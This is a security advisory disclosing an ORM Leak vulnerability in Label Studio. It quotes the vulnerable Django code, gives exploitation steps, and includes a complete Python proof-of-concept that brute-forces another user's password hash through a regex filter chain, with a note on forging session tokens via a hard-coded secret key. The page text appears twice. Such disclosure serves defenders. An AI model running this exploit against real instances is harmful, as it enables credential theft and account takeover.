Introduction
This write-up describes a vulnerability found in Label Studio, a popular open source data labeling tool. The vulnerability affects all versions of Label Studio prior to 1.9.2post0
and was tested on version 1.8.2
.
Overview
In all current versions of Label Studio, the application allows users to insecurely set filters for filtering tasks. An attacker can construct a filter chain to filter tasks based on sensitive fields for all user accounts on the platform by exploiting Django's Object Relational Mapper (ORM). Since the results of query can be manipulated by the ORM filter, an attacker can leak these sensitive fields character by character. For an example, the following filter chain will task results by the password hash of an account on Label Studio.
filter:tasks:updated_by__active_organization__active_users__password
For consistency, this type of vulnerability will be termed as ORM Leak in the rest of this disclosure.
In addition, Label Studio had a hard coded secret key that an attacker can use to forge a session token of any user by exploiting this ORM Leak vulnerability to leak account password hashes.
Description
The following code snippet from the ViewSetSerializer
in label_studio/data_manager/serializers.py
insecurely creates Filter
objects from a JSON POST
request to the /api/dm/views/{viewId}
API endpoint.
@staticmethod
def _create_filters(filter_group, filters_data):
filter_index = 0
for filter_data in filters_data:
filter_data["index"] = filter_index
filter_group.filters.add(Filter.objects.create(**filter_data))
filter_index += 1
These Filter
objects are then applied in the TaskQuerySet
in label_studio/data_manager/managers.py
.
class TaskQuerySet(models.QuerySet):
def prepared(self, prepare_params=None):
""" Apply filters, ordering and selected items to queryset
:param prepare_params: prepare params with project, filters, orderings, etc
:return: ordered and filtered queryset
"""
from projects.models import Project
queryset = self
if prepare_params is None:
return queryset
project = Project.objects.get(pk=prepare_params.project)
request = prepare_params.request
queryset = apply_filters(queryset, prepare_params.filters, project, request) <1>
queryset = apply_ordering(queryset, prepare_params.ordering, project, request, view_data=prepare_params.data)
if not prepare_params.selectedItems:
return queryset
# included selected items
if prepare_params.selectedItems.all is False and prepare_params.selectedItems.included:
queryset = queryset.filter(id__in=prepare_params.selectedItems.included)
# excluded selected items
elif prepare_params.selectedItems.all is True and prepare_params.selectedItems.excluded:
queryset = queryset.exclude(id__in=prepare_params.selectedItems.excluded)
return queryset
- User provided filters are insecurely applied here by calling the
apply_filters
that constructs the Django ORM filter.
The PreparedTaskManager
in label_studio/data_manager/managers.py
uses the vulnerable TaskQuerySet
for building the Django queryset for querying Task
objects, as shown in the following code snippet.
class PreparedTaskManager(models.Manager):
#...
def get_queryset(self, fields_for_evaluation=None, prepare_params=None, all_fields=False): <1>
"""
:param fields_for_evaluation: list of annotated fields in task
:param prepare_params: filters, ordering, selected items
:param all_fields: evaluate all fields for task
:param request: request for user extraction
:return: task queryset with annotated fields
"""
queryset = self.only_filtered(prepare_params=prepare_params)
return self.annotate_queryset(
queryset,
fields_for_evaluation=fields_for_evaluation,
all_fields=all_fields,
request=prepare_params.request
)
def only_filtered(self, prepare_params=None):
request = prepare_params.request
queryset = TaskQuerySet(self.model).filter(project=prepare_params.project) <1>
fields_for_filter_ordering = get_fields_for_filter_ordering(prepare_params)
queryset = self.annotate_queryset(queryset, fields_for_evaluation=fields_for_filter_ordering, request=request)
return queryset.prepared(prepare_params=prepare_params)
- Special Django method for the
models.Manager
class that is used to retrieve the queryset for querying objects of a model.
- Uses the vulnerable
TaskQuerySet
that was explained above.
The following code snippet of the Task
model in label_studio/tasks/models.py
shows that the vulnerable PreparedTaskManager
is set as a class variable, along with the updated_by
relational mapping to a Django user that will be exploited as the entrypoint of the filter chain.
# ...
class Task(TaskMixin, models.Model):
""" Business tasks from project
"""
id = models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID', db_index=True)
# ...
updated_by = models.ForeignKey(settings.AUTH_USER_MODEL, related_name='updated_tasks',
on_delete=models.SET_NULL, null=True, verbose_name=_('updated by'),
help_text='Last annotator or reviewer who updated this task') <1>
# ...
objects = TaskManager() # task manager by default
prepared = PreparedTaskManager() # task manager with filters, ordering, etc for data_manager app <2>
# ...
- The entry point of the filter chain to filter by the
updated_by__active_organization__active_users__password
.
- The vulnerable
PreparedTaskManager
being set that will be exploited.
Finally, the TaskListAPI
view set in label_studio/tasks/api.py
with the /api/tasks
API endpoint uses the vulnerable PreparedTaskManager
to filter Task
objects.
def get_queryset(self):
task_id = self.request.parser_context['kwargs'].get('pk')
task = generics.get_object_or_404(Task, pk=task_id)
review = bool_from_request(self.request.GET, 'review', False)
selected = {"all": False, "included": [self.kwargs.get("pk")]}
if review:
kwargs = {
'fields_for_evaluation': ['annotators', 'reviewed']
}
else:
kwargs = {'all_fields': True}
project = self.request.query_params.get('project') or self.request.data.get('project')
if not project:
project = task.project.id
return self.prefetch(
Task.prepared.get_queryset(
prepare_params=PrepareParams(project=project, selectedItems=selected, request=self.request),
**kwargs
)) <1>
- Uses the vulnerable
PreparedTaskManager
to filter objects.
Proof of Concept
Below are the steps to exploit about how to exploit this vulnerability to leak the password hash of an account on Label Studio.
- Create two accounts on Label Studio and choose one account to be the victim and the other the hacker account that you will use.
- Create a new project or use an existing project, then add a task to the project. Update the task with the hacker account to cause the entry point of the filter chain.
- Navigate to the task view for the project and add any filter with the
Network
inspect tab open on the browser. Look for a PATCH
request to /api/dm/views/{view_id}?interaction=filter&project={project_id}
and save the view_id
and project_id
for the next step.
- Download the attached proof of concept exploit script named
labelstudio_ormleak.py
. This script will leak the password hash of the victim account character by character. Run the following command to run the exploit script, replacing the {view_id}
, {project_id}
, {cookie_str}
and {url}
with the corresponding values. For further explanation run python3 labelstudio_ormleak.py --help
.
python3 labelstudio_ormleak.py -v {view_id} -p {project_id} -c '{cookie_str}' -u '{url}'
The following example GIF demonstrates exploiting this ORM Leak vulnerability to retrieve the password hash pbkdf2_sha256$260000$KKeew1othBwMKk2QudmEgb$ALiopdBpWMwMDD628xeE1Ie7YSsKxdXdvWfo/PvVXvw=
.
Impact
This vulnerability can be exploited to completely compromise the confidentiality of highly sensitive account information, such as account password hashes. For all versions <=1.8.1
, this finding can also be chained with hard coded SECRET_KEY
to forge session tokens of any user on Label Studio and could be abuse to deteriorate the integrity and availability.
Remediation Advice
- Do not use unsanitised values for constructing a filter for querying objects using Django's ORM. Django's ORM allows querying by relation field and performs auto lookups, that enable filtering by sensitive fields.
- Validate filter values to an allow list before performing any queries.
Discovered
- August 2023, Alex Brown, elttam
labelstudio_ormleak.py
proof of concept
import argparse
import re
import requests
import string
import sys
# Password hash characters
CHARS = string.ascii_letters + string.digits + '$/+=_!'
CHARS_LEN = len(CHARS)
PAYLOAD = {
"data": {
"columnsDisplayType": {},
"columnsWidth": {},
"filters": {
"conjunction": "and",
"items": [
{
"filter": "filter:tasks:updated_by__active_organization__active_users__password", # ORM Leak filter chain
"operator": "regex", # Use regex operator to filter password hash value
"type": "String",
"value": "REPLACEME"
}
]
},
"gridWidth": 4,
"hiddenColumns":{"explore":["tasks:inner_id"],"labeling":["tasks:id","tasks:inner_id"]},
"ordering": [],
"search_text": None,
"target": "tasks",
"title": "Default",
"type": "list"
},
"id": 1, # View ID
"project": "1" # Project ID
}
def parse_args() -> argparse.Namespace:
parser = argparse.ArgumentParser(
description='Leak an accounts password hash by exploiting a ORM Leak vulnerability in Label Studio'
)
parser.add_argument(
'-v', '--view-id',
help='View id of the page',
type=int,
required=True
)
parser.add_argument(
'-p', '--project-id',
help='Project id to filter tasks for',
type=int,
required=True
)
parser.add_argument(
'-c', '--cookie-str',
help='Cookie string for authentication',
required=True
)
parser.add_argument(
'-u', '--url',
help='Base URL to Label Studio instance',
required=True
)
return parser.parse_args()
def setup() -> dict:
args = parse_args()
view_id = args.view_id
project_id = args.project_id
path_1 = "/api/dm/views/{view_id}?interaction=filter&project={project_id}".format(
view_id=view_id,
project_id=project_id
)
path_2 = "/api/tasks?page=1&page_size=1&view={view_id}&interaction=filter&project={project_id}".format(
view_id=view_id,
project_id=project_id
)
PAYLOAD["id"] = view_id
PAYLOAD["project"] = str(project_id)
config_dict = {
'COOKIE_STR': args.cookie_str,
'URL_PATH_1': args.url + path_1,
'URL_PATH_2': args.url + path_2,
'PAYLOAD': PAYLOAD
}
return config_dict
def test_payload(config_dict: dict, payload) -> bool:
sys.stdout.flush()
cookie_str = config_dict["COOKIE_STR"]
r_set = requests.patch(
config_dict["URL_PATH_1"],
json=payload,
headers={
"Cookie": cookie_str
}
)
r_listen = requests.get(
config_dict['URL_PATH_2'],
headers={
"Cookie": cookie_str
}
)
r_json = r_listen.json()
return len(r_json["tasks"]) >= 1
def test_char(config_dict, known_hash, c):
json_payload_suffix = PAYLOAD
test_escaped = re.escape(known_hash + c)
json_payload_suffix["data"]["filters"]["items"][0]["value"] = f"^{test_escaped}"
suffix_result = test_payload(config_dict, json_payload_suffix)
if suffix_result:
return (known_hash + c, c)
return None
def main():
config_dict = setup()
# By default Label Studio password hashes start with these characters
known_hash = "pbkdf2_sha256$260000$"
print()
print(f"dumped: {known_hash}", end="")
sys.stdout.flush()
while True:
found = False
for c in CHARS:
r = test_char(config_dict, known_hash, c)
if not r is None:
new_hash, c = r
known_hash = new_hash
print(c, end="")
sys.stdout.flush()
found = True
break
if not found:
break
print()
if __name__ == "__main__":
main()
References
Introduction
This write-up describes a vulnerability found in Label Studio, a popular open source data labeling tool. The vulnerability affects all versions of Label Studio prior to
1.9.2post0
and was tested on version1.8.2
.Overview
In all current versions of Label Studio, the application allows users to insecurely set filters for filtering tasks. An attacker can construct a filter chain to filter tasks based on sensitive fields for all user accounts on the platform by exploiting Django's Object Relational Mapper (ORM). Since the results of query can be manipulated by the ORM filter, an attacker can leak these sensitive fields character by character. For an example, the following filter chain will task results by the password hash of an account on Label Studio.
For consistency, this type of vulnerability will be termed as ORM Leak in the rest of this disclosure.
In addition, Label Studio had a hard coded secret key that an attacker can use to forge a session token of any user by exploiting this ORM Leak vulnerability to leak account password hashes.
Description
The following code snippet from the
ViewSetSerializer
inlabel_studio/data_manager/serializers.py
insecurely createsFilter
objects from a JSONPOST
request to the/api/dm/views/{viewId}
API endpoint.These
Filter
objects are then applied in theTaskQuerySet
inlabel_studio/data_manager/managers.py
.apply_filters
that constructs the Django ORM filter.The
PreparedTaskManager
inlabel_studio/data_manager/managers.py
uses the vulnerableTaskQuerySet
for building the Django queryset for queryingTask
objects, as shown in the following code snippet.models.Manager
class that is used to retrieve the queryset for querying objects of a model.TaskQuerySet
that was explained above.The following code snippet of the
Task
model inlabel_studio/tasks/models.py
shows that the vulnerablePreparedTaskManager
is set as a class variable, along with theupdated_by
relational mapping to a Django user that will be exploited as the entrypoint of the filter chain.updated_by__active_organization__active_users__password
.PreparedTaskManager
being set that will be exploited.Finally, the
TaskListAPI
view set inlabel_studio/tasks/api.py
with the/api/tasks
API endpoint uses the vulnerablePreparedTaskManager
to filterTask
objects.PreparedTaskManager
to filter objects.Proof of Concept
Below are the steps to exploit about how to exploit this vulnerability to leak the password hash of an account on Label Studio.
Network
inspect tab open on the browser. Look for aPATCH
request to/api/dm/views/{view_id}?interaction=filter&project={project_id}
and save theview_id
andproject_id
for the next step.labelstudio_ormleak.py
. This script will leak the password hash of the victim account character by character. Run the following command to run the exploit script, replacing the{view_id}
,{project_id}
,{cookie_str}
and{url}
with the corresponding values. For further explanation runpython3 labelstudio_ormleak.py --help
.The following example GIF demonstrates exploiting this ORM Leak vulnerability to retrieve the password hash
pbkdf2_sha256$260000$KKeew1othBwMKk2QudmEgb$ALiopdBpWMwMDD628xeE1Ie7YSsKxdXdvWfo/PvVXvw=
.Impact
This vulnerability can be exploited to completely compromise the confidentiality of highly sensitive account information, such as account password hashes. For all versions
<=1.8.1
, this finding can also be chained with hard codedSECRET_KEY
to forge session tokens of any user on Label Studio and could be abuse to deteriorate the integrity and availability.Remediation Advice
Discovered
labelstudio_ormleak.py
proof of conceptReferences